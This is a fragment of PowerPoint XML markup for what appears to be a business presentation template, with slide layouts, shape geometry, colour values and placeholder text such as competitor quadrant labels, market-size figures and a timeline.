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258" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="259" r:id="rId8"/>
    <p:sldId id="265" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="261" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="283" r:id="rId15"/>
    <p:sldId id="284" r:id="rId16"/>
    <p:sldId id="276" r:id="rId17"/>
    <p:sldId id="285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1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53164"/>
    <a:srgbClr val="225B5F"/>
    <a:srgbClr val="E6E6E6"/>
    <a:srgbClr val="0F1722"/>
    <a:srgbClr val="348151"/>
    <a:srgbClr val="1B24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301B821-A1FF-4177-AEE7-76D212191A0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5" d="100"/>
          <a:sy n="85" d="100"/>
        </p:scale>
        <p:origin x="590" y="67"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="3840"/>
        <p:guide orient="horz" pos="3113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E4FC509-A25D-4AC1-956B-244FAC61AF2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EDCBDF-04F2-4646-A118-9A2CBABEDF9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A3C146-E2BA-41EA-8AE9-0C67692768F2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/3/2025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BD4EF4-9023-4CAF-937E-F78CF009DBD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300887-CA61-4CEF-BD28-E51D6F957D7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00C303-0EDA-42E1-9745-6C6A39A7B5C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67664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7D3EB6-8099-4744-9273-C8C1DD61A2EA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" noProof="0" smtClean="0"/>
              <a:t>10/3/2025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C40A10-6036-4879-816D-55C01FC94846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65739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78196A9-689D-4410-BFC0-7ACB19755A0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="4416552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-842" r="-84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9BFEAD-57CF-438A-8084-C5AC7F47E54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462986"/>
            <a:ext cx="9144000" cy="178609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7A3CB-B083-4E49-9123-A5E47559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4102C-4609-416C-A808-0FFE0051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BCC5D-6F2C-472F-BD4C-4096793D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E854BB-FA44-4CAB-85DF-F5C412560348}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4416552"/>
            <a:ext cx="12192000" cy="2441448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9BFFF1-5465-4317-B9DB-C23A5B1D7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4696"/>
            <a:ext cx="9144000" cy="45979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A313B4B-5B98-4B33-885A-DF7669E72D7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355336" y="1172982"/>
            <a:ext cx="1481328" cy="7589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76B4374-8F24-43DE-860D-E5C6EA850AB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3619265" y="2253996"/>
            <a:ext cx="4953471" cy="100584"/>
            <a:chOff x="3631692" y="2253996"/>
            <a:chExt cx="4953471" cy="10058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85C7755-9394-4129-AB48-1AC32DA80C75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3631692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4C71ABE-575A-48CF-82B1-EDE8535F3993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3C1EA63-78B2-4715-B4DC-63D98AC7F354}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8484579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9BB74A1-0BEA-4AD8-8138-0641A45D8B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4652581" y="5305363"/>
            <a:ext cx="2886839" cy="100584"/>
            <a:chOff x="3631690" y="2253996"/>
            <a:chExt cx="5028467" cy="100584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3D0026E-5270-4C52-A1AF-5631E8192DCD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6085D92-5F70-4097-A2FF-C15B13788D0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E68EB6C-48D0-4EBF-8541-926D16790F52}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8484578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424638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s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2016" y="707529"/>
            <a:ext cx="7118056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292016" y="1625821"/>
            <a:ext cx="7096709" cy="97840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4314481" y="1375202"/>
            <a:ext cx="7877519" cy="100800"/>
            <a:chOff x="245550" y="3240138"/>
            <a:chExt cx="401597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  <a:endCxn id="13" idx="6"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="245550" y="3290538"/>
              <a:ext cx="401597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4210138" y="324013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83723" y="3301941"/>
            <a:ext cx="3408243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l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$12,345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5716329" y="3394494"/>
            <a:ext cx="5678300" cy="978407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292016" y="3394494"/>
            <a:ext cx="1399099" cy="978407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6" name="Text Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA5D8D7D-F37C-49AD-98F0-641CE42B8A8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83723" y="4594663"/>
            <a:ext cx="3408243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l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$6,789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521FF93D-8384-4E22-8645-BDE6AB983488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5716329" y="4687216"/>
            <a:ext cx="5678300" cy="978407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BA358F36-EA77-462E-9158-AFDF1D449A1A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4292016" y="4687216"/>
            <a:ext cx="1399099" cy="978407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04119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Layout with circ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3242645"/>
            <a:ext cx="4464049" cy="117717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4872948"/>
            <a:ext cx="4443165" cy="88206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4581382"/>
            <a:ext cx="4370400" cy="100800"/>
            <a:chOff x="-1228304" y="3240138"/>
            <a:chExt cx="4370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4320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041296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5533023" y="4551485"/>
            <a:ext cx="5855702" cy="1208079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ADC059E4-36DE-4100-8F15-85A9F37E84FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3616960" y="859665"/>
            <a:ext cx="2121408" cy="2121408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4E475F8-9B44-4A3E-9F99-CF0346C89B8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5522965" y="836613"/>
            <a:ext cx="2816352" cy="281635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F5FAF95-28E9-4D03-884C-A89CBC8B61DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8123915" y="859665"/>
            <a:ext cx="3273552" cy="3273552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7" name="Text Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F221D05-AC12-4B7C-A00B-E28F93E23D7A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851931" y="1382322"/>
            <a:ext cx="168109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$25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A3904B01-A725-4CE3-9321-D42F3E296703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3927524" y="2363691"/>
            <a:ext cx="1519848" cy="617093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Section 1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D9CE08AF-782B-4514-BE33-D3AED71A734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06132" y="1185842"/>
            <a:ext cx="1519848" cy="250619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BILLION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{614098B4-704D-42A8-B776-2C93C30C39D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113495" y="1767897"/>
            <a:ext cx="168109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$50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CE6465F4-0B4D-4B43-BE59-BC984FE8EF05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6189088" y="2753338"/>
            <a:ext cx="1519848" cy="617093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Section 1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4DBC997E-F996-4F59-A610-3C8558F180C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6067696" y="1537655"/>
            <a:ext cx="1519848" cy="250619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BILLION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D2098E46-8023-469E-86ED-39848BCA69B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714444" y="2049128"/>
            <a:ext cx="2010420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$100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93715D94-9DBE-476D-B2A4-208BC6D40C35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8981735" y="3034569"/>
            <a:ext cx="1519848" cy="617093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t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Section 1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C6E1A50B-8AFF-497B-8AEC-C61D95DC0685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9089050" y="1818886"/>
            <a:ext cx="1519848" cy="250619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800" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Light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BILLION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39429258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ith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7529"/>
            <a:ext cx="5314072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1625821"/>
            <a:ext cx="5292725" cy="97840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383372"/>
            <a:ext cx="6096000" cy="100800"/>
            <a:chOff x="646015" y="3248308"/>
            <a:chExt cx="3107749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831851" y="3335524"/>
            <a:ext cx="4817836" cy="2248846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831850" y="2905291"/>
            <a:ext cx="2915732" cy="3600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BD2EF23-562D-4049-92E3-48371C9E83A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098826" y="3335524"/>
            <a:ext cx="5311245" cy="2248846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FB2A0B34-417C-46AC-95C0-9B2A2FCC8BFC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098826" y="2905291"/>
            <a:ext cx="2915732" cy="3600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80866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6105" y="707529"/>
            <a:ext cx="3704150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>
            <a:off x="-6" y="1374243"/>
            <a:ext cx="4319045" cy="100800"/>
            <a:chOff x="646012" y="3239179"/>
            <a:chExt cx="220185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2" y="3290538"/>
              <a:ext cx="216563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2796480" y="3239179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Picture Placeholder 11" descr="Competitors logos quadrant">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58A093A6-410B-4E4B-BA54-D31E8313D9B1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3928670" y="2872719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2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2" name="Picture Placeholder 11" descr="Competitors logos quadrant">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C852F764-614E-4E0D-B231-E5EF9B5D3AFE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806105" y="2171148"/>
            <a:ext cx="1655064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1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5" name="Picture Placeholder 11" descr="Competitors logos quadrant">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0349F007-C349-4EF3-A61F-86C43BEB5478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2729582" y="4456262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3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6" name="Picture Placeholder 11" descr="Competitors logos quadrant">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEA8BDDC-623F-4C67-AD04-E7801B537019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6829546" y="2770168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4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7" name="Picture Placeholder 11" descr="Competitors logos quadrant">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B0D00B-97E7-4133-B35A-AC2EF334CD2B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6610067" y="4588832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5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8" name="Picture Placeholder 11" descr="Competitors logos quadrant">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D1A7417-EFAD-46F6-ADA5-117D4C7B1A9D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9571158" y="4977452"/>
            <a:ext cx="1772153" cy="777240"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000" i="1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Competitor 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Logo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D4B80E14-BBC8-42CC-8777-FFF50D168A09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89869" y="3642757"/>
            <a:ext cx="2741612" cy="248888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:no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More expensive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95033551-3DD0-4EBE-8DFD-9335F8BA9268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315481" y="5884080"/>
            <a:ext cx="2741612" cy="248888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr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Less convenient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CC507E62-D7F3-4E81-8DE2-5A7084588A3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15481" y="1343118"/>
            <a:ext cx="2741612" cy="248888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l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More convenient</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Picture Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61EF622D-8E08-41C3-BEBA-2274C2AB487A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17999" y="1977257"/>
            <a:ext cx="1481328" cy="758952"/>
          </a:xfrm>
          <a:noFill/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690ADA54-0156-49A9-AEF7-A4972EEB15AA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651686" y="3642757"/>
            <a:ext cx="2741612" cy="248888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r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/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Less expensive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2193FB7-0142-40DD-9186-F3156B0AE4B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6045600" y="1376748"/>
            <a:ext cx="100800" cy="5481252"/>
            <a:chOff x="6045600" y="1376748"/>
            <a:chExt cx="100800" cy="5481252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CD1389D4-2EB7-40E2-B21B-4EE70FCA2236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3389377" y="4151376"/>
              <a:ext cx="5413248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A48E795-AD00-4819-94E4-A5211D331715}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6045600" y="1376748"/>
              <a:ext cx="100800" cy="1008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1BD97BD-35F4-4534-8B74-24D44A99BC58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="5400000">
            <a:off x="5669857" y="-1673474"/>
            <a:ext cx="100800" cy="11440514"/>
            <a:chOff x="6045600" y="1329588"/>
            <a:chExt cx="100800" cy="11440514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8351F13-467F-49F8-8279-C5B29A51798F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="408032" y="7082102"/>
              <a:ext cx="1137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09AA12FA-7959-4581-B344-DF9E7B0AD37A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6045600" y="1329588"/>
              <a:ext cx="100800" cy="1008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9395588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Section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7" y="1512271"/>
            <a:ext cx="2828198" cy="12868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1" y="3148315"/>
            <a:ext cx="2216876" cy="2098138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897696"/>
            <a:ext cx="3360726" cy="100800"/>
            <a:chOff x="0" y="3240138"/>
            <a:chExt cx="3360726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276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259926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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA80730C-5AC9-41A0-ACC5-624F0652D68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475261" y="2631676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7200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22" name="Text Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{515B23A8-23EB-4E6E-A24C-4154570D7DC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7436251" y="2015540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3600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C12919ED-FD55-4081-BB4A-2B2FDA3BED1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397240" y="1239687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3600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3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6A6259C-432B-4405-9E82-995AF092FB7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4068065" y="1728891"/>
            <a:ext cx="17928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3BC485E-8BCE-479F-A7E9-7F9E193E6E96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4964465" y="836613"/>
            <a:ext cx="59256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5094BC6-BA16-4E05-868C-3AE971AF3DA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="10688444" y="1030491"/>
            <a:ext cx="39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9130EC6-4A8D-447F-862E-E5A693E68C8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7925455" y="837355"/>
            <a:ext cx="0" cy="11781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1B29C9C1-9494-4E8B-A0F3-611E947A19B3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3151266" y="4543170"/>
            <a:ext cx="2589369" cy="1280958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ABB09D16-148A-45C2-B0B8-1495E8DC7D64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3151265" y="4246467"/>
            <a:ext cx="2415199" cy="236141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67814C7C-3597-4B16-A4AC-D81985C587BD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3151265" y="3883902"/>
            <a:ext cx="2415199" cy="360000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EFE2A8C5-F462-436C-B748-BBE5D58CB8B4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6048861" y="3849559"/>
            <a:ext cx="2589369" cy="1786953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586DAC0D-9859-40A1-8456-F0B43D96718B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6048860" y="3552857"/>
            <a:ext cx="2415199" cy="236141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37B983EE-F89D-4F09-8A9F-2347FA36421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048860" y="3190292"/>
            <a:ext cx="2415199" cy="360000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D30DD128-A937-4A2F-B070-523A5BAAE260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975159" y="3147170"/>
            <a:ext cx="2589369" cy="2311934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5737B87C-E3C0-46B2-8B79-63EB60491503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8975158" y="2850467"/>
            <a:ext cx="2415199" cy="236141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22F76863-7DCD-4365-80F0-001D51F08779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8975158" y="2487902"/>
            <a:ext cx="2415199" cy="360000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="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30782733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and Chart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707529"/>
            <a:ext cx="5314072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383372"/>
            <a:ext cx="6096000" cy="100800"/>
            <a:chOff x="646015" y="3248308"/>
            <a:chExt cx="3107749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831850" y="2031832"/>
            <a:ext cx="2915732" cy="3600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FB2A0B34-417C-46AC-95C0-9B2A2FCC8BFC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096000" y="2031832"/>
            <a:ext cx="2915732" cy="360000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6F8EF-728B-45C1-87D8-4AD8FA8F3716}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="32"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="803275" y="2524125"/>
            <a:ext cx="4970463" cy="29352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7395C5B4-6B03-4F70-96F8-3AE3A7817B52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="33"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2524125"/>
            <a:ext cx="4970463" cy="2935288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789154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36466" y="707529"/>
            <a:ext cx="2673606" cy="569086"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="3600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>TIMELINE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147803" y="1625821"/>
            <a:ext cx="2262267" cy="2021536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9186215" y="1375202"/>
            <a:ext cx="3005785" cy="100800"/>
            <a:chOff x="2729180" y="3240138"/>
            <a:chExt cx="153234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2729180" y="3290538"/>
              <a:ext cx="1504927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4210138" y="324013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618284" y="685667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5930241" y="1079309"/>
            <a:ext cx="2810591" cy="75886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5930241" y="786637"/>
            <a:ext cx="2810591" cy="29267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AD3A3AB-488E-4090-9FD5-E005D5A9ECF5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2094269" y="3429000"/>
            <a:ext cx="685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BD6729DC-C5B3-485B-B5CD-F06FC3CAFD9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372392" y="9598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4046DD7-8FB2-43D4-8E94-3D35DC3E2891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372392" y="53623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A320A73A-D3CB-4E04-B7E2-F3696B8ACDEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372392" y="24273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E2B01F0-78A8-41AE-95B8-811603402031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372392" y="3894827"/>
            <a:ext cx="301752" cy="301752"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0F172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A70E382B-B932-45B7-BD95-6D722A4A2480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5930241" y="2532448"/>
            <a:ext cx="2810591" cy="75886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2F096B52-06C2-46DF-BB33-70D931283F16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5930241" y="2239776"/>
            <a:ext cx="2810591" cy="29267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5D87FD43-95C9-4217-AD5F-FE02E28AD4CE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5930241" y="3985587"/>
            <a:ext cx="2810591" cy="75886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A6706CEB-523E-4248-9A66-5D139D8B0DE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5930241" y="3692915"/>
            <a:ext cx="2810591" cy="29267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6ADC931C-F9B2-467E-A024-CB5BE74BAD85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5930241" y="5438727"/>
            <a:ext cx="2810591" cy="758864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0A301DE6-2E75-41F5-9314-B269815BA3F3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5930241" y="5146055"/>
            <a:ext cx="2810591" cy="292671"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t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0" name="Text Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9154606-4DE0-4DC7-830A-371423BE420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618284" y="2153566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41" name="Text Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC8C127-0F88-413C-B7BA-2ED0F81E7D4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2618284" y="3621465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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C5707A-6E08-4B58-A5FE-40063DB6548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2618284" y="5089363"/>
            <a:ext cx="2616212" cy="978408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350">
            <a:noFill/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20XX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36275356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260000"/>
            <a:ext cx="3911599" cy="117717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890303"/>
            <a:ext cx="3275463" cy="88206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598737"/>
            <a:ext cx="3764756" cy="100800"/>
            <a:chOff x="-1228304" y="3240138"/>
            <a:chExt cx="3764756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672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435652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3F646CE6-E75B-4112-896D-5A26E1F1520E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5518150" y="860425"/>
            <a:ext cx="5870575" cy="4867275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table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8392325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7" y="1608523"/>
            <a:ext cx="2828198" cy="12868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1" y="3244567"/>
            <a:ext cx="2828198" cy="2098138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2258048" cy="100800"/>
            <a:chOff x="0" y="3240138"/>
            <a:chExt cx="2258048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2160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157248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1B29C9C1-9494-4E8B-A0F3-611E947A19B3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4128617" y="4355032"/>
            <a:ext cx="2066544" cy="128095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ABB09D16-148A-45C2-B0B8-1495E8DC7D64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128616" y="4042831"/>
            <a:ext cx="2066544" cy="282991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67814C7C-3597-4B16-A4AC-D81985C587BD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4128616" y="3428999"/>
            <a:ext cx="2066544" cy="615618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284A57B-147A-4287-AA6B-E508A9222F7F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4130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5" name="Picture Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DBE0996-CEA3-41C3-A75A-84DC3C2B5194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9128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6" name="Picture Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B28261-CB14-4E4E-AA66-A0239B3DD28E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="35"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629072" y="1179843"/>
            <a:ext cx="2066544" cy="2066544"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="127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BAA53E0C-9536-4177-A63F-0E2565EC53CD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9127048" y="4355032"/>
            <a:ext cx="2066400" cy="128095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67EF8E36-183B-420B-AF25-17CFA963987A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9127047" y="4042831"/>
            <a:ext cx="2066400" cy="282991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58DA6E86-8039-4690-AFE1-7CCF07B7CBAF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9127047" y="3428999"/>
            <a:ext cx="2066400" cy="615618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933214B9-0452-4C8B-AB10-922F3C3BCF01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629217" y="4355032"/>
            <a:ext cx="2066400" cy="128095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A5C23113-D98B-48C7-A675-4FD5F50333F3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6629216" y="4042831"/>
            <a:ext cx="2066400" cy="282991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09781257-B563-41E0-B9E6-9C7330084BCC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6627903" y="3428999"/>
            <a:ext cx="2066400" cy="615618"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
